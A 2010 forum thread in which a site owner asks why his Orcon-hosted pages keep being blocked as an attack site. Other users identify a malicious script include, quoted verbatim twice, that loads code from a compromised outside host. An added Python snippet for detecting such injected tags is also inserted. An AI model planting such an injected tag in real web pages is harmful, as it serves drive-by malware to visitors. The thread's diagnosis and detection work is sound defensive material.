| Thread ID: 108750 | 2010-04-10 03:25:00 | Trouble with my personal webspace | kirkmc (15074) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 874784 | 2010-04-10 03:25:00 | Hi, wonder if any experts here can suggest a course of action. I'm part of a group of music enthusiasts and use my personal webspace at Orcon for the group to access various bits and pieces. Been doing this for several years. About a month ago, Firefox started blocking me as a 'Reported Attack Site'. I followed the procedure to fix this (which involved something to do with Google) and it went away. However it has now re-occurred 5 times in the last month. The site is http://kirk.orconhosting.net.nz/ There's nothing I know of that causes this, what's there are all innocent links and some html stuff for display. I do notice strange stuff appears in my .html files that are part of the Google adware that pays for the site. Orcon tell me this stuff is OK, but if you view the source and follow some of their links you also get a 'Reported Attack Site' message. Attempts to contact Google came to nothing - I can't find a phone number or email. Firefox's website (Mozilla) shows an Auckland address but this turns out to be the Lone Star bar in Newmarket. Orcon can't - or won't help. Can I do anything to stop this happening all the time, and how can I find out what's causing it? I can't believe my site is important enough to interest hackers or the like. Thanks for any suggestions. Kirk |
kirkmc (15074) | ||
| 874785 | 2010-04-10 04:02:00 | Orcon can't - or won't help. Then bump it up to more senior people at Orcon because you can't fix it from your end. |
pctek (84) | ||
| 874786 | 2010-04-10 05:54:00 | I doubt whether Orcon will be interested in looking into it - it's probably nothing to do with them at all - these things are usually the result of your site being compromised and code added to yours somewhere. You say you "notice strange stuff appears in my .html files that are part of the Google adware" I had a quick look at your source on your 3 pages - and the first thing that makes me very suspicious is the line with a script include call after head closing and before the body open tags This is the Google ads script, which immediately follows after the body opening tag and within the div tags <body> <div> Google adds code here </div> This is not part of Google ads <script src=http://blessit.com.ar/seminarios/servicios.php ></script><body> I don't know what else you may have, as I say, was just a quick look, but that line should definitely be there I think A quick google on the file name servicios.php (in the url) brings back many sites that look like they were hacked and unknowingly hosted the same script that is being called by yours - the ones that now have ... Warning: bla bla......failed to open stream: No such file or directory and similar Also, I note that the file on blessit.com.ar is no longer there either - they were obviously informed of it/ found it recently and removed it too. Anyway, hope that helps some - if you need some more help, give me a pm and I'll do whatever I can for you |
bevy121 (117) | ||
| 874787 | 2010-04-10 05:58:00 | I tried the site and it's blocked for me, too. Did you click the 'Why was this page blocked' link? Copy and paste below, not sure if some of this info will help you track down why it's being blocked, but do any of the 3 domains listed there ring any bells? Sounds like they are the cause of your problems...? Safe Browsing Diagnostic page for kirk.orconhosting.net.nz What is the current listing status for kirk.orconhosting.net.nz? Site is listed as suspicious - visiting this web site may harm your computer. Part of this site was listed for suspicious activity 2 time(s) over the past 90 days. What happened when Google visited this site? Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-09, and the last time suspicious content was found on this site was on 2010-04-09. Malicious software includes 1 scripting exploit(s). Malicious software is hosted on 3 domain(s), including aspergia-forum.de/, ville-de-lyon.fr/, maserinformatica.com.ar/. This site was hosted on 1 network(s) including AS17746 (Orcon Internet). Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, kirk.orconhosting.net.nz did not appear to function as an intermediary for the infection of any sites. Has this site hosted malware? No, this site has not hosted malicious software over the past 90 days. How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. Next steps: * Return to the previous page. * If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center. |
Chikara (5139) | ||
| 874788 | 2010-04-10 06:11:00 | OOPS lol that should read "was just a quick look, but that line should definitely NOT be there I think" (and my time allowed to edit had expired!) Chikara yea - that's the usual generic info... Kirk said he has already gone thru those motions a month ago and has happened 5 times more ...no, I "ignored" the block and visited the sites pages to get the info I did get Obviously, I did so in a safe environment tho! :) |
bevy121 (117) | ||
| 874789 | 2010-04-10 06:42:00 | oh and btw Chikara - those 3 domains listed are not the cause of the probs, they are places where scripts to be called were also placed I would imagine. It's the code on his own site that needs to be cleansed |
bevy121 (117) | ||
| 874790 | 2010-04-10 09:20:00 | Thanks for the feedback/comments. Agreed, the script line referring to blessit.com shouldn't be there and ok it isn't part of Google ads. I guess that 'extra stuff' and the Google ads, both being additions to my source, appeared to be somehow connected. Yes I have been down the 'Why was this site blocked?' path, replaced all the files and had normal operation resume, only to have these php scripts re-appear the very same day. How do they get there? I have reloaded index.html at about 8pm today. I'll systematically replace the rest (again!) this evening. I expect they'll be shot again tomorrow. A pity they can't be edited on line, it would be much quicker. (Or can they?) Not sure where to go from here... still looking for a reason/solution if anyone has one. BTW password was changed, to one of max strength but it made no difference. It's not just Firefox - I've also been told There is something amiss - when I try and access from IE. AVG blocks the page. Kirk |
kirkmc (15074) | ||
| 874791 | 2010-04-10 09:31:00 | It blocks it here with FF too, but it loads in IE 8 OK. And Malwarebyte's protection module doesn't block it (usually it will), if something is going on I've come across this blocking in FF twice (once with XP computers (in Newmarket), (when FF blocked it and MBAM stopped / blocked it) it was getting hacked, so I found out. It had something to do with their host. And Eden computer 10 mins walk from me here. Just the other day. But, this has now been fixed |
Speedy Gonzales (78) | ||
| 874792 | 2010-04-10 15:34:00 | For anyone interested, I replaced/cleaned all web files between 8-10pm Sat night and now at 2:20 am Sunday I see "<script src=http://blessit.com.ar/seminarios/servicios.php ></script>" is back again in my index.html. So this time it wasn't even 24 hours! In the meantime via 'Webmaster Tools', Google had cleared my site, but I expect it'll be blacklisted again very soon. Surely someone can explain what's going on??? Why can't Orcon stop this happening? They must be letting *whoever* into my files to add this script code into my stuff. Pain in the *****, that's for sure! Kirk |
kirkmc (15074) | ||
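
An added example, not part of any post in this thread: a small Python check that parses a page and flags external script includes whose host is outside an allowlist or that sit between `</head>` and `<body>`, the two traits that single out the injected line discussed above. The allowlisted ad host, the `SAMPLE` page and all function and class names are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the one external host this site knowingly loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"pagead2.googlesyndication.com"}

# Constructed sample page; line 3 reproduces the tag quoted in the thread.
SAMPLE = """<html>
<head><title>Music group</title></head>
<script src=http://blessit.com.ar/seminarios/servicios.php ></script><body>
<div><script src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script></div>
</body></html>
"""

class ScriptAudit(HTMLParser):
    """Record <script src=...> tags that are off-allowlist or misplaced."""
    def __init__(self):
        super().__init__()
        self.head_closed = self.body_opened = False
        self.findings = []  # (line, src, reasons)

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.body_opened = True
        src = dict(attrs).get("src") if tag == "script" else None
        if not src:
            return  # not an external script include
        reasons = []
        host = urlparse(src).hostname
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("host not on allowlist")
        if self.head_closed and not self.body_opened:
            reasons.append("between </head> and <body>")
        if reasons:
            self.findings.append((self.getpos()[0], src, reasons))

    def handle_endtag(self, tag):
        if tag == "head":
            self.head_closed = True

def audit_html(text):
    """Return (line, src, reasons) findings for one HTML document."""
    parser = ScriptAudit()
    parser.feed(text)
    parser.close()
    return parser.findings

if __name__ == "__main__":
    for line, src, reasons in audit_html(SAMPLE):
        print(f"line {line}: {src} ({', '.join(reasons)})")
```

Because it uses an HTML parser rather than a pattern for `src="..."`, the unquoted `src=` form seen in the thread is still caught. Run over a local copy of the site's files after each upload, it shows when the line has come back.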
| 874793 | 2010-04-10 15:44:00 | You did change your passwords, didn't you? | fred_fish (15241) | ||